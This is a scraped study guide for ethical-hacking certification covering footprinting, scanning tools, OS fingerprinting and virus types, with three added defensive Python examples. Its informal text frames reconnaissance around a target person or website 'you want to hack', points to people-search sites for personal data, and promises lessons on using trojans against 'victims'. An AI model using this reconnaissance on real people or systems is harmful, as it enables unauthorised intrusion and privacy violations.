
CEH Course Material


Page 1: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 1/67

CERTIFIED ETHICAL HACKER 

Study Guide

copyright © 2016 EAPL 1


database to crash. As a result, developers and users were unable to upload or download any applications.

DIFFERENCE BETWEEN HACKER AND CRACKER 

There are lots of articles on the internet about the difference between Hackers and Crackers. For many years, the media has erroneously used the word Hacker for a Cracker. So the general public now believes a hacker is someone who breaks into computer systems, hacking passwords and websites and misusing them. But this is absolutely untrue and it demoralizes some of our most talented hackers.

The greatness of the misconception you can determine from the fact that the world's biggest authentic source, WIKIPEDIA, has defined hackers in an incorrect way. Wikipedia has defined hackers in the following way:

“Hacking is unauthorised use of computer and network resources. (The term “Hacker” originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.)”

There is a very thin line of difference between the hacker and the cracker. Like a coin has two faces, heads or tails, the same is true for computer experts. Some use their techniques and expertise to help others and secure systems or networks, and some misuse them for their own selfish reasons.

There are several traditional ways that determine the difference between hackers and crackers. In this book we will provide you these ways in order of their acceptance in the computer and IT market. First of all, let me provide you the basic definitions of both hackers and crackers.

These definitions are as follows:

Hackers: A Hacker is a person who is extremely interested in exploring the things and recondite workings of any computer system or networking system. Most often, hackers are expert programmers. These are also called Ethical Hackers or white hat hackers, and the technique of hacking they perform is called ethical hacking.

Ethical Hacking means you think like Hackers, i.e. first you Hack the Systems and find out the loop holes, and then try to correct those Loop Holes. These types of hackers protect the cyberworld from every possible threat and fix the future security loop holes. These people are also called the “GURUs” of Computer Security.

Crackers: Crackers, or Black Hat hackers, cheaters or simply criminals; they are called criminals because they have the mind-set of causing harm to security and they steal very useful data and use it in wrong ways. Phishers also come in this category, who steal account info and steal your credit card nos. and money over the Net.

Below is the Diagram which shows the basic difference between crackers or black hat hackers and Hackers or ethical hackers or white hat hackers.

We hope this will help you to clear most of your doubts about hackers and crackers. And the most important thing: until and unless an ethical hacker thinks like a cracker you can never become an expert ethical hacker, because to get the most out of any computer system you must understand the mind-set of crackers, what they can do and up to what level they can damage.

Now when you identify the vulnerabilities and loopholes, if you fix them so that in future nobody can breach that same vulnerability then you are a Hacker or ethical hacker or White Hat hacker, and if you utilize that loophole for misdeeds or for fun then it is cracking or Black hat hacking. And black hat hackers are intelligent people but criminals, or simply, cyber cops call them evil genius.

BEST OPERATING SYSTEM FOR HACKERS

Most users are confused about which operating system is best for hackers and for doing hacking activities like hacking wireless network passwords, network sniffers, reverse engineering tools, application hacking tools and other encrypting and spoofing hacking tools. Here we suggest the operating system Backtrack or Kali Linux.


But you can also give a try to Matriux Operating System and Knoppix. Matriux OS is just awesome but it's still under construction, as the designers are still working on it and patching it.

Now let's discuss more about the functionality of the Backtrack operating system.

Best Operating System: Backtrack Linux

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you're making BackTrack your primary operating system, booting from a Live DVD, or using your favorite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

BackTrack is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hat hackers, it provides easy access to software that facilitates exploitation of secured systems and other reverse engineering. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!


Major Features of BackTrack Linux


BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will not enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don't need to worry about that. It's just plug-and-play, ready-to-go!

What's great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, once you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMware Virtual Appliance for Backtrack. Make sure you also install the VMware Tools for Linux as well. Many features will still work in VMware mode.

• Based on: Debian, Ubuntu

• Origin: Switzerland

• Architecture: i386

• Desktop: Fluxbox, KDE

• Category: Forensics, Rescue, Live Medium

• Cost: Free

Hacking Tools:

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

• Metasploit integration

• RFMON Injection capable wireless drivers

• Kismet

• Nmap

• Ettercap

• Wireshark (formerly known as Ethereal)

• BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:

• Information Gathering

• Network Mapping

• Vulnerability Identification

• Web Application Analysis

• Radio Network Analysis (802.11, Bluetooth, Rfid)

• Penetration (Exploit & Social Engineering Toolkit)

• Privilege Escalation

• Maintaining Access

• Digital Forensics

• Reverse Engineering

• Voice Over IP

CHAPTER: FOOTPRINTING

Footprinting and How It can be Helpful to Hack systems


2. Now you can use this information to search more about the Person using simply Google, as shown in the next snapshot..


Now it's up to you how much info you want to explore about the person and website which you want to hack…


I think you all Will Like This… WE will continue Our Discussion on FOOTPRINTING tomorrow also… As It is the Most Important Phase…

We will Explore More Information in the Next class… I will explain a Few More interesting facts and information-exploring things, so read on…

UNEARTHING BASIC INFORMATION

First of all We will focus on Unearthing the Basic Information about the site… i.e. the IP and server information..

I will Show you with the help of snapshots:

First go to START > RUN > type cmd > then type tracert www.websitename.com

Here we will use two basic commands in the command Prompt (cmd): tracert www.websitetobeanalysed.com and ping www.websitename.com

It will look something like this:

We trace routed www.amulive.com

1. Shows Our Gateway of connectivity.

2. Shows our Outgoing Footprint IP, i.e. our IP that is being analyzed by the website.

3. Shows through which service Provider the Connectivity passes. I use BSNL but it's showing Airtel because I prefer the DNS of Airtel for surfing Quick.

The next steps show the IPs of the Webservers through which amulive is being maintained.

After This We will come to know the IP of the Website and the IPs of its web servers which are being used further.

The website IP can be used to gather more information about the website..


How to Find The Personal Information About the Individual Over Net ??

It's one of the Most important tasks. It's also helpful in finding the fake profiles… But unfortunately this is limited; still we can use it to the Most… There are two websites which will help us…

1. http://people.yahoo.com best Site To trace People for their Personal Information and also reverse Phone or mobile number Look up

2. http://www.intellius.com But this site is limited to US only

Sample Report from Intellius:


Satellite Picture of Joe's House from Intellius:

Now Using these Sites you will be able to collect the personal information of the individuals and also be able to identify the fake profiles..

TOOLS NEEDED FOR FOOTPRINTING :

You can avoid the above hectic work by using this tool: SpiderFoot

Download link: http://www.binarypool.com/spiderfoot

Information about SpiderFoot:

SpiderFoot is a free, open-source, domain footprinting tool. Given one or multiple domain names (and when I say domains, I'm referring to the DNS kind, not Windows domains), it will scrape the websites on that domain, as well as search Google, Netcraft, Whois and DNS to build up information like:

• Subdomains

• Affiliates

• Web server versions

• Users (i.e. @user)

• Similar domains

• Email addresses

• Netblocks

ADDITIONAL FOOTPRINTING TOOLS :

Note all these tools are freeware.. You can easily google them and download these..

• Whois

• Nslookup

• ARIN

• Neo Trace

• VisualRoute Trace

• SmartWhois

• eMailTrackerPro

• Website watcher

• Google Earth

• GEO Spider

• HTTrack Web Copier

• E-mail Spider

This is all about Footprinting. Now Use the Gathered information to make basic Detailed Information about the Website/person…


CHAPTER: SCANNING NETWORKS

Scanning and Attacking Open Ports

In the Scanning Part We Will Cover the Following Topics in detail:

• Definition of scanning

• Types and objectives of Scanning

• Understanding Scanning methodology

• Checking live systems and open ports

• Understanding scanning techniques

• Different tools present to perform Scanning

• Understanding banner grabbing and OS fingerprinting

• Drawing network diagrams of vulnerable hosts

• Preparing proxies

• Understanding anonymizers

• Scanning countermeasures

What Is Scanning ?? And Why We Focus On that ?

Scanning, as from the name, means that we will scan something to find some details etc etc… Scanning basically refers to the gathering of the following four pieces of information…

We Scan systems for four basic purposes:-


• To find a specific IP address

• Operating system

• System Architecture

• Services Running on the system

The various types of scanning are as follows:

• Port Scanning

• Network Scanning

• Vulnerability Scanning

I want to Define These Terms here Only as they are of great use in further tutorials…

PORT SCANNING : There are 65k ports in a computer, out of which 1k are fixed for system or OS services. In Port scanning we scan for the open Ports which can be used to attack the victim computer.

In Port scanning a series of messages is sent to break into a computer to learn about the computer's network services. Through this we will know which port we will use to attack the victim..

Network Scanning : Network scanning is basically a procedure of finding the active hosts on the Network, i.e. we try to find whether the system is standalone or multiuser… This is done either for the purpose of attacking them or for network security assessment, i.e. how secured the network is.

Vulnerability Scanning : As from the name, in this type of scanning we scan the systems for finding the vulnerability, i.e. the weakness in the OS/database… Once we find the vulnerability or loop hole we can utilize it to the Best.. and attack the victim through that…

OBJECTIVES OF SCANNING

These are the Primary objectives of scanning, i.e. why do we do scanning:

• To detect the live systems running on the network.

• To discover which ports are active/running.

• To discover the operating system running on the target system (fingerprinting).

• To discover the services running on the target system.

• To discover the IP address of the target system.
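As an added example for the “Scanning countermeasures” topic in the list above (not from this course; the log format and the thresholds are assumptions), the Python below detects the two scan types just defined from constructed firewall log lines: a port scan shows up as one source probing many distinct ports on a host within a short window, a network scan as one source probing many distinct hosts.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed firewall-style connection log for this example (not real traffic).
# Format assumed here: "<ISO time> <src> -> <dst>:<dport> <verdict>".
SAMPLE_LOG = """\
2016-03-01T10:00:00 10.0.0.5 -> 10.0.0.20:21 DROP
2016-03-01T10:00:00 10.0.0.5 -> 10.0.0.20:22 ACCEPT
2016-03-01T10:00:01 10.0.0.5 -> 10.0.0.20:23 DROP
2016-03-01T10:00:01 10.0.0.5 -> 10.0.0.20:25 DROP
2016-03-01T10:00:02 10.0.0.5 -> 10.0.0.20:80 ACCEPT
2016-03-01T10:00:02 10.0.0.5 -> 10.0.0.20:110 DROP
2016-03-01T10:00:03 10.0.0.5 -> 10.0.0.20:139 DROP
2016-03-01T10:00:03 10.0.0.5 -> 10.0.0.20:443 ACCEPT
2016-03-01T10:00:04 10.0.0.5 -> 10.0.0.20:445 DROP
2016-03-01T10:00:04 10.0.0.5 -> 10.0.0.20:3389 DROP
2016-03-01T10:00:05 10.0.0.7 -> 10.0.0.20:80 ACCEPT
2016-03-01T10:00:09 10.0.0.7 -> 10.0.0.20:443 ACCEPT
2016-03-01T10:00:30 10.0.0.7 -> 10.0.0.20:80 ACCEPT
2016-03-01T10:01:00 10.0.0.8 -> 10.0.0.31:445 DROP
2016-03-01T10:01:00 10.0.0.8 -> 10.0.0.32:445 DROP
2016-03-01T10:01:01 10.0.0.8 -> 10.0.0.33:445 DROP
2016-03-01T10:01:01 10.0.0.8 -> 10.0.0.34:445 DROP
2016-03-01T10:01:02 10.0.0.8 -> 10.0.0.35:445 DROP
2016-03-01T10:01:02 10.0.0.8 -> 10.0.0.36:445 DROP
2016-03-01T10:05:00 10.0.0.9 -> 10.0.0.20:21 DROP
2016-03-01T10:08:00 10.0.0.9 -> 10.0.0.20:22 ACCEPT
2016-03-01T10:11:00 10.0.0.9 -> 10.0.0.20:23 DROP
2016-03-01T10:14:00 10.0.0.9 -> 10.0.0.20:25 DROP
"""

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (\w+)$")


def parse_log(text):
    """Turn log lines into (timestamp, src, dst, dport) tuples; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, port, _verdict = m.groups()
            events.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return events


def _peak_distinct(rows, min_distinct, window_s):
    """rows: (timestamp, key, value). For each key, slide a window of window_s
    seconds over its rows in time order and record the peak number of distinct
    values seen inside one window. Keys reaching min_distinct come back as
    {key: peak}. The window is what separates a burst from normal traffic that
    happens to touch the same ports or hosts over hours."""
    by_key = defaultdict(list)
    for ts, key, value in rows:
        by_key[key].append((ts, value))
    span = timedelta(seconds=window_s)
    alerts = {}
    for key, hits in by_key.items():
        hits.sort()
        window, counts, peak = deque(), Counter(), 0
        for ts, value in hits:
            window.append((ts, value))
            counts[value] += 1
            while ts - window[0][0] > span:        # evict rows older than the window
                _old_ts, old_value = window.popleft()
                counts[old_value] -= 1
                if counts[old_value] == 0:
                    del counts[old_value]
            peak = max(peak, len(counts))
        if peak >= min_distinct:
            alerts[key] = peak
    return alerts


def detect_port_scans(events, min_ports=8, window_s=60):
    """Port scan: one source touching many distinct ports on one destination host.
    Returns {(src, dst): peak distinct ports}."""
    return _peak_distinct(((ts, (src, dst), port) for ts, src, dst, port in events),
                          min_ports, window_s)


def detect_host_sweeps(events, min_hosts=5, window_s=60):
    """Network scan (sweep): one source touching many distinct destination hosts.
    Returns {src: peak distinct hosts}."""
    return _peak_distinct(((ts, src, dst) for ts, src, dst, _port in events),
                          min_hosts, window_s)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("port scans :", detect_port_scans(evts))   # 10.0.0.5 -> 10.0.0.20, 10 ports
    print("host sweeps:", detect_host_sweeps(evts))  # 10.0.0.8, 6 hosts
```

The slow source 10.0.0.9 probes four ports three minutes apart and stays under the 60-second window, which is exactly the gap a slow scan exploits; widening the window or lowering the threshold trades that blind spot for more false positives.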

We will prefer TOOLS for this because they will reduce our Hectic Work… The first Tool that we Use is NMAP,

DOWNLOAD: http://nmap.org/dist/nmap-5.x-setup.exe


Features of NMAP :

• Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and many other techniques.

• It scans a large number of machines at one time.

• It is supported by many operating systems.

• It can carry out all types of port scanning techniques.

SECOND TOOL IS NET TOOLS 5.0.70 :

It's a collection of various Networking Tools… a must for beginners…

DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-2213.html

• Net Tools Suite Pack is a collection of scanning tools.

• This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers. Note: Some of these tools may not Work but some are too good.


First of Which is OS Fingerprinting…

What is OS Fingerprinting ??

OS fingerprinting is the method to determine the operating system that is running on the target system.

The two different types of fingerprinting are:

• Active stack fingerprinting

• Passive fingerprinting

Active Stack Fingerprinting:

Based on the fact that OS vendors implement the TCP stack differently. Specially crafted packets are sent to remote OSs and the response is noted. The responses are then compared with a database to determine the OS.

Passive Fingerprinting:

Passive banner grabbing refers to indirectly scanning a system to reveal its server's operating system.

It is also based on the differential implementation of the stack and the various ways an OS responds to it.

It uses sniffing techniques instead of the scanning techniques. It is less accurate than active fingerprinting.

TOOL USED FOR OS FINGERPRINTING : p0f OS Fingerprinting Tool

DOWNLOAD:

http://lcamtuf.coredump.cx/p0f-win32.zip

p0f v2 is a versatile passive OS fingerprinting tool. p0f can identify the operating system on:

• machines that connect to your box (SYN mode),

• machines you connect to (SYN+ACK mode),

• machines you cannot connect to (RST+ mode),

• machines whose communications you can observe.

p0f can also do many other tricks, and can detect or measure the following:

• firewall presence, NAT use (useful for policy enforcement),

• existence of a load balancer setup,

• the distance to the remote system and its uptime,

• other guy's network hookup (DSL, OC3, avian carriers) and his ISP.
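To make the passive side concrete, here is an added Python sketch (not p0f itself and not from this course) of what a passive fingerprinter does with a SYN it merely observes: match TTL, window size, DF bit and TCP option order against a signature table, estimate the hop distance from the likely initial TTL, and flag NAT when one address shows several different fingerprints. The signature values are toy assumptions, not p0f's database.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Syn:
    """Fields of a TCP SYN that a passive observer can read without sending a
    single packet. The values used below are constructed for this example."""
    src: str
    ttl: int          # TTL as seen on the wire, already decremented by each hop
    window: int       # TCP window size advertised in the SYN
    df: bool          # IP "don't fragment" bit set?
    options: tuple    # TCP option kinds in the order they appear


# Toy signature table, an assumption for illustration only; p0f's real database
# is far larger and also normalises the window against the MSS.
SIGNATURES = {
    "Linux 2.6 (toy sig)":  dict(init_ttl=64, window=5840, df=True,
                                 options=("mss", "sackok", "ts", "nop", "ws")),
    "Windows XP (toy sig)": dict(init_ttl=128, window=65535, df=True,
                                 options=("mss", "nop", "nop", "sackok")),
    "FreeBSD (toy sig)":    dict(init_ttl=64, window=65535, df=True,
                                 options=("mss", "nop", "ws", "sackok", "ts")),
}

COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def guess_initial_ttl(observed_ttl):
    """Stacks start at one of a few well-known TTLs; the smallest one that is
    not below the observed value is the most likely starting point."""
    for init in COMMON_INITIAL_TTLS:
        if observed_ttl <= init:
            return init
    return 255


def fingerprint(syn):
    """Match one observed SYN against the signature table.
    Returns (os_label or None, estimated hop distance to the sender)."""
    init_ttl = guess_initial_ttl(syn.ttl)
    distance = init_ttl - syn.ttl
    for label, sig in SIGNATURES.items():
        if (sig["init_ttl"] == init_ttl and sig["window"] == syn.window
                and sig["df"] == syn.df and sig["options"] == syn.options):
            return label, distance
    return None, distance        # unknown stack: distance is still usable


def detect_nat(syns):
    """One IP address presenting several different fingerprints is the classic
    passive hint of NAT or a shared gateway. Returns the suspect addresses."""
    seen = defaultdict(set)
    for syn in syns:
        seen[syn.src].add(fingerprint(syn))
    return sorted(src for src, prints in seen.items() if len(prints) > 1)


# Constructed observations (RFC 5737 documentation addresses, not real hosts).
OBSERVED = [
    Syn("192.0.2.10", 51, 5840, True, ("mss", "sackok", "ts", "nop", "ws")),
    Syn("192.0.2.10", 115, 65535, True, ("mss", "nop", "nop", "sackok")),
    Syn("198.51.100.7", 60, 65535, True, ("mss", "nop", "ws", "sackok", "ts")),
    Syn("203.0.113.9", 240, 8192, False, ("mss",)),
]

if __name__ == "__main__":
    for syn in OBSERVED:
        print(syn.src, fingerprint(syn))
    print("NAT suspected behind:", detect_nat(OBSERVED))   # ['192.0.2.10']
```

Because nothing is sent, the observer only learns what the remote stack volunteers in its SYN, which is why the text calls this less accurate than active fingerprinting: a tuned or unusual stack simply returns no match.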


What is Vulnerability???

As I have Told in the First class, a Vulnerability is a weakness in the network, system, database etc… We can call a vulnerability the Loophole, i.e. through which the victim can be attacked.. We first analyze the loophole and then try to use it to the best to Hack the System of the victim or organisation or website…

TOOLS THAT WE USE FOR VULNERABILITY SCANNING ARE :

1. Nessus

2. Retina

NESSUS

The Nessus vulnerability scanner is the world-leader in active scanners, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.


Features:

• Plug-in architecture

• NASL (Nessus Attack Scripting Language)

• Can test an unlimited number of hosts simultaneously

• Smart service recognition

• Client-server architecture

• Smart plug-ins

• Up-to-date security vulnerability database

SAMPLE SNAPSHOT:


DOWNLOAD NESSUS :

http://www.nessus.org/download

RETINA

Retina Network Security Scanner, the industry and government standard for multi-platform vulnerability management, identifies known and zero day vulnerabilities plus provides security risk assessment, enabling security best practices, policy enforcement, and regulatory audits.


DOWNLOAD RETINA:

http://www.eeye.com/html/products/retina/download/index.html

Now After Scanning the Systems for Vulnerabilities.. We will Now be Going to attack the Systems, but before this we should know the Risk. This risk can be reduced to a great extent by using Proxies.. In the Next Class We will Discuss what Proxies are and How they work and how they are going to Help us, and some undetectable and untraceable Proxy servers…

SCANNING AND ATTACKING OPEN PORTS

In my Previous class I have explained about footprinting, i.e. getting the IP of the Person/website/organisation whom you want to attack and extracting the personal Information.. You all were thinking what was the use of that.. In this class you will come to know why we have undergone the footprinting and analysis part…



I think that's Enough for Today. We will discuss more on scanning tomorrow. Until then, You try these tools..

If you have any problem in Using these tools then you can ask me.. I will help you use these tools…


INTRODUCTION TO TROJANS, VIRUSES AND BACKDOORS

Welcome Back Guys, After a heavy Busy Schedule I come with the Next Hacking Tutorial. I think everybody who is using a computer has faced the problem of viruses at least once in life. In today's Class I am going to Introduce What Trojans, Viruses, Backdoors, worms etc. are, And How they work to infect the system. In later classes we will discuss more about them, Like How to Get rid of Viruses, Trojans etc., How to remove them and the Most Important, How to Use them for Hacking Victims' systems etc.. So Guys Keep Reading..

Let's Start With Viruses… What are These and How they Work..

VIRUSES:

A Virus is a self-replicating program that produces its own code by attaching copies of itself into other executable code like executable files (.exe), Dynamic link Libraries (.dlls) etc..

A Virus Generally operates in the background and of course without the Desire of the User, as No one wants that virus to harm their computer.. ROFL :P

Some Well-known Characteristics of Viruses:

• Resides in the memory and replicates itself while the program where it is attached is running

• Does not reside in the memory after the execution of the program

• Can transform themselves by changing codes to appear different


Fig: Infection Phase, showing how the virus attaches to .exe files to infect Programs.

Fig: Attack Phase, showing how the Files get Fragmented and system speed Slows Down


DIFFERENCE BETWEEN WORMS AND VIRUSES

Most of us think that worms are viruses and their working is similar to viruses, but this is not the real scenario. There is a Big difference between the general viruses and Worms.

A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs. A worm spreads through the infected network automatically but a virus does not.

How To Detect Your System is Infected by Virus??

This is one of the major questions to answer, and the simplest answer to it is that there are some General Indications that Indicate whether the System is infected or Not.

General Indications are stated Below:

• Programs take longer to load than normal, because the virus halts the normal working of programs as it attaches itself to them, so the execution time increases.

• Computer's hard drive constantly runs out of free space.

• Files have strange names which are not recognizable.

• Programs act erratically (Programs Give errors on use).

• Resources are used up easily (can be Easily viewed using task manager).

HOW DOES THE VIRUS INFECT THE SYSTEM??

Viruses infect the system in the following ways:

1. Loads itself into memory and checks for executables on the disk.

2. Appends the malicious code to a legitimate program which is Important to the user.

3. Since the user is unaware of the replacement, he/she launches the infected program.

4. As a result of the infected program being executed, other programs get infected as well.

5. The above cycle continues until the user realizes the anomaly within the system.


STAGES OF VIRUS LIFE CYCLE FROM DESIGN TO ELIMINATION

The life cycle indicated above is a general life cycle of the Virus from the design Phase to the Elimination phase…

VIRUS CLASSIFICATION - TYPES OF VIRUSES

Viruses are classified on the basis of two basic Things:

1. What they Infect

2. How they infect

Examples:

System Sector or Boot Virus:

• Infects disk boot sectors and records.

File Virus:

• Infects executables in the OS file system.

Macro Virus:

• Infects documents, spreadsheets and databases such as Word, Excel and Access.

Source Code Virus:

• Overwrites or appends host code by adding Trojan code in it.

Network Virus:

• Spreads itself via email by using commands and protocols of the computer network.

Different Types of Virus and Worms Explained

System Sector Virus

System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC. System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses. These boot viruses use all of the common viral techniques to infect and hide themselves. They rely on an infected floppy disk left in the drive when the computer starts; they can also be “dropped” by some file infectors or Trojans.

Stealth Virus

These viruses evade anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is “clean”.

Bootable CD-ROM Virus

These are a new type of virus that destroys the hard disk data content when booted with the infected CD-ROM.

Example: Someone might give you a LINUX BOOTABLE CD-ROM. When you boot the computer using the CD-ROM all your data is gone. No Anti-virus can stop this because AV software or the OS is not even loaded when you boot from a CD-ROM.

Self-Modification Virus

Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. Self-modification viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection (each infected file contains a different variant of the virus).

Polymorphic Code Virus

A well-written polymorphic virus therefore has no parts that stay the same on each infection. To enable polymorphic code the virus has to have a polymorphic engine (also called mutating engine or mutation engine). Polymorphic code is code that mutates while keeping the original algorithm intact.

Metamorphic Virus

Metamorphic viruses rewrite themselves completely each time they are to infect new executables. Metamorphic code is code that can reprogram itself by translating its own code into a temporary representation and then back to normal code again. For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it is part of the metamorphic engine.

File Extension Virus

File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT. If you've forgotten that extensions are actually turned off, you might think this is a text file and open it. This is really an executable Visual Basic Script virus file and could do serious damage.

Countermeasure is to turn off “Hide file extensions” in Windows.
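An added Python example (not from this course) that shows the extension trick from the defender's side: what a name such as BAD.TXT.VBS looks like while extensions are hidden, and a check that flags names where an executable extension sits behind a decoy one. The list of executable extensions is an illustrative assumption, not an exhaustive one.

```python
import os

# File types Windows executes on double-click (an illustrative subset chosen for
# this example, not an exhaustive list).
EXECUTABLE_EXTENSIONS = {
    ".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse",
    ".wsf", ".wsh", ".scr", ".pif", ".hta", ".ps1", ".lnk",
}


def displayed_name(filename, hide_extensions=True):
    """What Explorer shows with 'Hide file extensions for known file types' on:
    the final extension is stripped, so BAD.TXT.VBS is displayed as BAD.TXT."""
    if not hide_extensions:
        return filename
    stem, ext = os.path.splitext(filename)
    return stem if ext else filename


def is_disguised_executable(filename):
    """True when the real (last) extension is executable and a second,
    harmless-looking extension sits in front of it, e.g. README.TXT.VBS."""
    stem, real_ext = os.path.splitext(filename)
    if real_ext.lower() not in EXECUTABLE_EXTENSIONS:
        return False
    decoy_ext = os.path.splitext(stem)[1]
    # A plain "setup.exe" has no decoy; "a.bat.exe" hides nothing a user could miss.
    return bool(decoy_ext) and decoy_ext.lower() not in EXECUTABLE_EXTENSIONS


def audit(filenames):
    """Return (filename, name as the user would see it, real extension) for every
    name that hides an executable behind a decoy extension."""
    findings = []
    for name in filenames:
        if is_disguised_executable(name):
            findings.append((name, displayed_name(name),
                             os.path.splitext(name)[1].lower()))
    return findings


# Constructed sample listing, as an attachment folder might show it.
SAMPLE_NAMES = [
    "README.TXT",        # genuine text file
    "BAD.TXT.VBS",       # the course's example: a VBScript posing as text
    "photo.jpg.exe",     # executable posing as an image
    "setup.exe",         # plainly executable, nothing hidden
    "notes.txt.bak",     # double extension but not executable
    "archive.tar.gz",    # double extension but not executable
]

if __name__ == "__main__":
    for name, shown, real in audit(SAMPLE_NAMES):
        print(f"{name!r} is shown as {shown!r} but really runs as {real}")
```

With extensions hidden, the user sees "BAD.TXT" and "photo.jpg"; with the setting turned off as the text recommends, both names appear in full and the decoy stops working.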


How to stop virus or trojan attacks

If you want to know whether your system is infected by viruses and trojans, these are certain techniques to know that:

1. Your computer might be running slower than normal.

2. Some programs might open without your permission.

3. System start up takes too much time.

4. Various error messages appear on screen when you open something, or even without opening anything.

5. System registry has been disabled or folder options is missing.

6. The most important: antivirus shows messages of detecting viruses from time to time.

7. While scanning your system with any antivirus or anti-spyware tool it shows viruses, and you notice that the viruses are not being deleted.

and much more…

Have you ever thought about the reason why your system got infected? What has infected your system, and if it was done by one of your friends, how did he do it? Surely no! Or in some cases you have tried to find the answer but were not able to get a proper answer. But the story is different here! I will tell you all the ways how your system can get infected, how you can protect it, and if it is already infected how you can resolve the problem. So here are a few ways how your system got infected; some might know this but for some reason have ignored them.

How a System gets Infected because of Negligence?

1. Using Cracked Versions of software, especially security ones like antivirus, anti-spyware etc.

Why I have said this is the first and major cause of infection is because of the following simple reason: all hackers know that the general internet user public always searches for cracked versions of software and wishes to use them for free, and hackers take advantage of them. You may all now be thinking, how does it help hackers? We know that almost all antivirus programs show each and every keygen as a virus or some trojan depending upon its type. Now if we all know that, then how come hackers would forget this fact? So what they do is attach trojans and viruses to these files, and at the time when your antivirus shows it as a virus you ignore the alert and keep the keygen, meaning the trojan, running.

NOTE: And guys, an important note for you all: if your antivirus doesn't show any keygen or crack as a virus then don't ever think that it's not a virus; it is a most dangerous thing. Why dangerous? Because now the hacker has used some more brain to fool you, that is he has made the virus undetectable by simply editing the hex code of the original virus. So what is the moral of the story? Please don't use cracked versions.

Now you all may be thinking that if we don't use the cracked versions then how will we be able to get full versions of the software. Don't worry, when I am there no fear, drink beer and enjoy everything for free. Its solution will be in the solutions step, just read the article.

2. Pen drive or USB drive:

The biggest cause of infection of your system is USB drives and external hard disks. Now how does a virus enter your system using USB drives? You have connected your USB drive to your friend's computer and by chance (sorry, it's for sure, i.e. 100%) your friend's system is infected by a virus or trojans, and it's the property of a virus that it replicates itself using memory. So when you connect your USB to your friend's computer your USB is now infected by the virus. Now when you connect this USB to your PC, it is the property of your Windows that it searches the files on a newly connected device and autoruns the device, and for doing this it loads the index of your USB's file system into memory; now if the USB has a virus, it's the property of the virus that it replicates itself using system memory. Now if you are using a good antivirus, your antivirus will pop up warning and alert messages, and sometimes you ignore them, meaning your system is also infected. For the USB drive virus solution keep reading the article.

3. Downloading things from Unknown Sites:

Most users search for things over the internet and wherever they find their desired result, meaning the file that they want, they start downloading that from that site only. Now how does it affect your system? Suppose you want to download some wallpaper, say Katrina Kaif. Now hackers know the fact that Katrina has a huge fan following and users will surely download it. Then what they do is simply bind their malicious code with some of the files, and when users download it their system is infected, and they can never imagine that the virus has come from the wallpaper that they downloaded from an unknown site. For its solution read on in the article.

4. The most important one: Becoming a Hacker like Me (ROFL, but it's the truth).

Why I have mentioned this might be clear to you from the above discussion. Most internet users are always curious to know ways how they can hack their friend's email account or his system; for this they download all types of shit from the internet, and believe me 99.9% of this shit contains viruses and trojans that send your information to the providers. Now I don't say stop hacking, but try to follow some basic steps to learn hacking, and first of all you must know how to protect yourself from such fake software. For its solution read on in the article.


Now after discussing how your system gets infected by your simple negligence, it's time you should know how to fix them and protect your system from all types of viruses and trojans.

HOW TO STOP VIRUS OR TROJANS ??

1. Using Good Antivirus: There is a misconception among internet users that a full antivirus provides better security. Yes, it's 100% true, but full antiviruses means paid ones, not the cracked ones. There are several other solutions that you will get for absolutely free, and I guarantee that it will protect your system 100% just by doing some little configuration.

Best Free Antivirus: Avira Personal Antivirus, i.e. Antivir.

You can download Avira for free from:

http://www.filehippo.com/download_antivir/

Now after downloading the antivirus, what do you have to do to make it as good as paid antiviruses?

a. Install the antivirus and update it. Note: updating the antivirus regularly is compulsory. Don't worry, it's not your work; it will update itself automatically whenever an update is available.

b. After installing, at the right hand top corner you will see a "CONFIGURATION" button. Just click on it; now a new window will pop up.

